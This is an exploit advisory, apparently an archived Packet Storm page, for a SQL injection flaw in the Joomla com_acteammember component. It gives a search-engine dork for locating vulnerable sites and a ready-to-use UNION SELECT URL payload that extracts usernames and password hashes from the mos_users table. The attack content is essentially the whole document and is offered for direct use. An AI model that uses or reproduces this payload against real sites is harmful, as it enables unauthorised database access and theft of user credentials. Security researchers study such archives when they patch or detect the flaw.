The Joomla ACTeamMember component suffers from a remote SQL injection vulnerability.
d14e701fea615352dcec51bbdec1fc0280eda58ea81f02e1121055e39fd7b57b
Joomla Component com_acteammember Sql Injection Vulnerability
==============================================================
####################################################################
.:. Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
.:. Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
.:. Dork : inurl:"com_acteammember"
####################################################################
===[ Exploit ]===
www.site.com/index.php?option=com_acteammember&id=[SQL]&Itemid=121&lang=en<http://www.site.com/index.php?option=com_acteammember&id=[SQL]&Itemid=121&lang=en>
www.site.com/index.php?option=com_acteammember&id=-1+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en<http://www.site.com/index.php?option=com_acteammember&id=-1+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en>
####################################################################
Greats T0: aB0-3tH4b T3rR0r & RxH
Thanks T0: AtT4CKxT3rR0r1ST
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed